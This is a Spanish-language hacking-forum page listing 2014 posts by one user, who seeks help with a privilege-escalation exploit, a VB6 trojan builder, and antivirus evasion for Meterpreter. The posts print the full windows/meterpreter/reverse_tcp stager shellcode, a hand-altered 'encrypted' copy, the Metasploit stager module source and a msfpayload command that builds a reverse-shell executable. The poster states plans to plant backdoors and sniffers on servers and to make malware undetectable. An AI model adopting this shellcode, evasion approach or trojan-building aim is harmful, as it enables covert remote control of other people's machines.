Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cibi

Páginas 1 ... 3 4 5 6 7
#81
Dudas y pedidos generales / Re:Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?
Noviembre 06, 2014, 12:32:59 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Arquitectura 32 o 64 bits
Lanza un 'uname -r' en la consola para ver el kernel de tu SO


Saludos

He hecho el comando uname -r y me sale esto:
2.6.32-431.11.2.el6.x86_64
#82
Dudas y pedidos generales / Re:Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?
Noviembre 06, 2014, 10:49:46 AM
Si perdona el sistema operativo es Linux CentOS y la version del ssh por si hace falta es:
22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
Pero a que te refieres con arquitectura?
#83
Dudas y pedidos generales / Ayuda este exploit me sirve para elevar privilegios y tener permisos en ssh?
Noviembre 06, 2014, 07:13:14 AM
Hola me gustaría saber si este exploit me serviría para tener permisos de root si tengo acceso a un servidor ssh?
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este exploit esta en c y al compilarlo y ejecutarlo me da las siguientes opciones:
./exploit [-l <retloc offset>] [-r <retaddr offset>] [-v <version pad>] <target>
Pero no se a que se refiere con las 3  primeras opciones estoy buscando un root exploit con el que pueda elevar privilegios y tener permisos si tengo acceso a un servidor ssh y poder usar mis puertas traseras, snifers etc...
O que exploit me serviría ?
#84
Dudas y pedidos generales / Re:Ayuda cifrando shellcode windows/meterpreter/reverse_tcp
Octubre 18, 2014, 10:35:55 AM
ok gracias intentare cifrarla bien y te digo algo
#85
Dudas y pedidos generales / Ayuda cifrando shellcode windows/meterpreter/reverse_tcp
Octubre 17, 2014, 04:14:30 PM
Hola hace unos días publique un tema de que necesitaba el source de un payload, ahora estoy intentando cifrar la shellcode del payload: windows/meterpreter/reverse_tcp
Yo conozco un método para cifrar una shellcode que era sumándole 3 a cada byte en hexadecimal por ejemplo esta es la shellcode original del payload windows/meterpreter/reverse_tcp
Código: text
 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
            "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
            "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
            "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
            "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
            "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
            "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
            "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
            "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
            "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" +
            "\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
            "\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" +
            "\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
            "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" +
            "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" +
            "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"

Según me dijo un usuario para cifrar en hexadecimal se contaba de esta manera:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f
Entonces por ejemplo si quiero cifrar el primer digito de \xFC\ cifrada seria:
\xFF\  Y luego según me dijeron le tenia que sumar 1 al otro dígito y quedaría de esta manera:
\x0F\
Ya que me dijeron que una vez llegaba a f volvía a contar desde el 0 y he hecho todo este proceso manualmente con la shellcode completa y toda cifrada quedaría así:
Código: text
"\x0F\xFB\x99\x13\x13\x13\x73\x9C\xF8\x44\xE5\x77\x9E\x65\x43\x9E" +
            "\x65\x1F\x9E\x65\x27\x9E\x85\x41\x12\xCA\x5D\x39\x44\x02\x44\xD3" +
            "\xBF\x4F\x74\x8F\x15\x3F\x33\xD4\xD2\x10\x14\xDA\xF5\x03\x65\x6A" +
            "\x9E\x65\x23\x9E\x55\x4F\x9E\x5F\x23\x8B\xF6\x5D\x14\xE4\x64\x9E" +
            "\x6C\x33\x14\xE6\x9E\x62\x31\xF6\x4F\x5C\x9E\x47\x9E\x14\xE9\x44" +
            "\x02\x44\xD3\xBF\xD4\xD2\x10\x14\xDA\x51\xF3\x88\x07\x16\x80\x0B" +
            "\x4E\x80\x37\x88\xF5\x6B\x9E\x6B\x37\x14\xE6\x79\x9E\x1F\x5E\x9E" +
            "\x6B\x2F\x14\xE6\x9E\x17\x9E\x14\xE3\x9C\x57\x37\x37\x6E\x6E\x74" +
            "\x6C\x6D\x64\x02\xF3\x6B\x62\x6D\x9E\x25\xFE\x9C\x60\x7B\x46\x45" +
            "\x13\x13\x7B\x8A\x86\x45\x62\x67\x7B\x5F\x8A\x39\x1A\x02\xE8\xCB" +
            "\xA3\x14\x13\x13\x3C\xD7\x67\x63\x7B\x3C\x93\x7E\x13\x02\xE8\x63" +
            "\x63\x63\x63\x53\x63\x53\x63\x7B\xFD\x12\xE2\xF3\x02\xE8\xAA\x7D" +
            "\x18\x7B\x82\x13\x13\x14\x7B\x15\x13\x24\x6F\x9C\xF9\x7D\x23\x69" +
            "\x6A\x7B\xAC\xB8\x87\x74\x02\xE8\x98\xD3\x87\x1F\x02\x51\x1B\x88" +
            "\xFF\x7B\x03\xC8\xB5\x69\x02\xE8\x7D\x13\x7D\x17\x69\x6A\x7B\x15" +
            "\xEC\xDB\x62\x02\xE8\x9E\x49\x7D\x53\x7B\x13\x23\x13\x13\x69\x7D" +
            "\x13\x7B\x6B\xB7\x66\xF8\x02\xE8\xA6\x66\x7D\x13\x69\x66\x6A\x7B" +
            "\x15\xEC\xDB\x62\x0B\xE8\x14\xD6\x3C\xD9\x98\x09\x88\xFF\xD6"

No se si me abre equivocado en algún dígito ya que me lio un poco, entonces una vez cifre la shellcode pase el code completo a la ruta donde se encontraba antes el payload windows/meterpreter/reverse_tcp, después de haber puesto el code del payload donde estaba antes probé en una terminal de crear un ejecutable con ese payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=MI IP LPORT=4444 x > payloadcifrado.exe
Al meterlo en mi otro pc con windows y avast, el avast lo detecto...
Este método de cifrar una shellcode sumando 3 a cada byte sirve para poder crear un ejecutable malicioso indetectable, o solo sirve para exploits normales?
Haber si alguien me puede aclarar esta duda porque puede que la haya cifrado mal, me haya equivocado en algún dígito o este método ya no funcione...
#86
Dudas y pedidos generales / Re:como puedo configurar un dominio?
Octubre 09, 2014, 09:23:48 AM
Tienes que poner las dns de tu proveedor quiero decir donde tu has comprado el dominio tienes que preguntárselo a los que te han vendido el dominio. Un saludo
#87
Dudas y pedidos generales / Re:Problemas con troyano en vb6
Octubre 09, 2014, 08:52:09 AM
El caso es que había bloqueado el tema porque vi en masters hackers que en el apartado de compra y venta se podía vender algo de malware cosa que no estaba seguro de hacer y aun sigo dudando aunque no creo que lo venda porque aun me queda mucho por aprender y creo que no debería ya que no me gusta que lo usen para fines delictivos a no ser que haga un programa de administración remota sin que sea un "rat", bueno lo que quería hacer era tener un form aparte, con los campos noip puerto y el botón de crear servidor quiero decir lo de crear server.exe.
El troyano ya lo tengo casi acabado el problema que no entiendo muy bien como acabar el servidor y el botón de crear servidor... Mis conocimientos en vb6 son básicos entonces yo hice el botón de crear servidor de la siguiente forma:
Código: vb
Private Sub Command1_Click()
Dim noip As String
Dim puerto As String
Dim Servidor As String
noip = Text1.Text
puerto = Text2.Text
If noip = Text1.Text And puerto = Text2.Text Then
Open noip = "Text1.Text" For Binary As #1
Put #1, 1, noip
Close #1
Open puerto = "Text2.Text" For Binary As #1
Servidor = Space(LOF(1))
Close #1
CommonDialog1.Filter = "Ejecutables (*.exe)|*.exe|Archivos bat (*.bat)|*.bat"
CommonDialog1.ShowSave
MsgBox "Servidor guardado correctamente", vbInformation
End If
End Sub

Y el servidor no se como hacerlo quiero decir para que guarde el noip y el puerto y genere el  server.exe
Cuando le doy al botón de crear servidor y guardar server.exe me sale el mensaje de que se ha guardado correctamente pero no esta el archivo..
Alguien puede ayudarme con ese código para que genere el .exe
#88
Off Topic / Re:Porque todas las películas de hackers que hay la mayoría son antiguas?
Octubre 06, 2014, 01:31:57 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ostras esa no la conocía
#89
Off Topic / Re:Porque todas las películas de hackers que hay la mayoría son antiguas?
Octubre 06, 2014, 11:13:29 AM
creo que si la vi hace un tiempo, esta bien, también vi la de 23 nada es lo que parece, es antigua también pero en esta pelicula en ese tiempo no había ni sistema operativo era todo por comandos. 
#90
Off Topic / Porque todas las películas de hackers que hay la mayoría son antiguas?
Octubre 06, 2014, 11:01:56 AM
Hola alguien conoce películas de hackers nuevas? He visto algunas de hace años que están muy bien como la famosa película: Juegos de Guerra
Y la que sale Kevin Mitnick y algunas mas que están bien pero la mayoría son de hace años y no hay ninguna mas moderna?
La mas moderna que hay creo que es la de reboot de una chica que tiene que usar metasploit para quitarse un iphone pegado en la mano pero no me gusto mucho...
Creo que lo mas nuevo que hay son documentales y los capítulos de mundo hacker tv pero que haya películas mas modernas que yo sepa no jaja.
#91
Dudas y pedidos generales / Problemas con troyano en vb6
Octubre 02, 2014, 05:31:50 PM
Hola me gustaría que alguien me ayudara a resolver unos problemas que tengo con un troyano en vb6, el primer problema es que he usado un skin para el troyano y cuando lo ejecuto me sale el skin perfectamente pero los nombres de los labels no están, quiero decir que no se ven...
Hay alguna solución para que se vean los nombres de los labels?
Por otra parte no acabo de entender como acabar el troyano quiero decir la parte de guardar el server cuando le asigne el noip y el puerto.
#92
Dudas y pedidos generales / Re:Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 30, 2014, 03:35:52 PM
ok gracias esto me serviría si por ejemplo si cifro la shellcode de windows/meterpreter/reverse_tcp de crear un ejecutable con msfpayload windows/meterpreter/reverse_tcp etc... Quiero decir el ejecutable si tengo la shellcode cifrada sera indetectable ?
O si utilizo un exploit con ese payload sera indetectable a los antivirus?
#93
Dudas y pedidos generales / Re:Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 29, 2014, 04:50:51 PM
Entonces después de f no viene de 10 al 14 simplemente cuando llega a la f vuelve al 0? Si no he entendido mal.
#94
Dudas y pedidos generales / Re:Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 29, 2014, 04:23:29 PM
Gracias creo que lo voy entendiendo pero tengo una duda mas x99 cifrada como seria?
Y las que estan en x00 se tienen que tocar?
#95
Dudas y pedidos generales / Re:Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 28, 2014, 03:34:04 PM
Hola me refería cifrar la shellcode de ese payload y unirlo a metasploit conozco un método que era sumarle 3 a cada byte de la shellcode pero creo que no es tan sencillo como pensaba porque por ejemplo esta parte de la shellcode del payload windows/meterpreter/reverse_tcp:
\xFC\xE8\x86\
el /x86/ cifrado seria de la siguiente forma:
/x89/
Creo que no me equivoco pero cuando hay letras por en medio me resulta un poco mas complicado, según vi en un libro para cifrarla pasa de /x86/ a /x89/ pero cuando hay letras se trabaja en hexadecimal por ejemplo una shellcode de esta manera:
0x68 cifrada seria 0x6b porque en hexadecimal para cifrar se cuenta de la siguiente forma:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, a, b, c, d, e, f, 10, 11, 12, 13, 14
Pero no entiendo como podría cifrar esto:
\xFC\xE8\
Por ejemplo:
\xFC\ es la original
Pero cifrada podría ser:
\x12F\
Es que no acabo de entenderlo bien.
#96
Dudas y pedidos generales / Re:Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 28, 2014, 07:23:17 AM
Ok gracias el de windows/meterpreter/reverse_tcp puede ser este?
Código: text
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'
require 'msf/core/handler/reverse_tcp'


module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Windows

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Reverse TCP Stager',
      'Description'   => 'Connect back to the attacker',
      'Author'        => ['hdm', 'skape', 'sf'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Convention'    => 'sockedi',
      'Stager'        =>
        {
          'RequiresMidstager' => false,
          'Offsets' => { 'LHOST' => [ 194, 'ADDR' ], 'LPORT' => [ 201, 'n' ], 'ReverseConnectRetries' => [ 192, 'C'] },
          'Payload' =>
            # Built on Tue Jan 14 03:04:51 2014

            # Name: stager_reverse_tcp_nx
            # Length: 287 bytes
            # Port Offset: 201
            # Host Offset: 194
            # RetryCounter Offset: 192
            # ExitFunk Offset: 226
            "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
            "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
            "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
            "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
            "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
            "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
            "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
            "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
            "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
            "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" +
            "\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
            "\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" +
            "\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
            "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" +
            "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" +
            "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"

        }
      ))


  end

end

Y como que el de java reverse_tcp no tiene shellcode ?
#97
Dudas y pedidos generales / Ayuda necesito el source del payload java/meterpreter/reverse_tcp o otro
Septiembre 27, 2014, 03:01:04 PM
Hola me gustaría saber donde puedo encontrar el source del payload java/meterpreter/reverse_tcp donde pueda encontrar la shellcode, quiero intentar cifrar la shellcode de un exploit bueno solo era eso.
También me gustaría saber como unir el payload al exploit supongo que me entenderán.
#98
Dudas y pedidos generales / Re:Como puedo extraer los metadatos de una imagen .jpg en bash?
Septiembre 22, 2014, 01:46:35 PM
Si si ya lo he solucionado gracias!
#99
Dudas y pedidos generales / Re:Como puedo extraer los metadatos de una imagen .jpg en bash?
Septiembre 22, 2014, 12:10:36 PM
ok no te preocupes intentare solucionarlo
#100
Dudas y pedidos generales / Re:Como puedo extraer los metadatos de una imagen .jpg en bash?
Septiembre 22, 2014, 11:10:07 AM
ok gracias pero podrías darme una idea de como seria el code mas o menos para tener una idea, declarando funciones o alguna variable.
Páginas 1 ... 3 4 5 6 7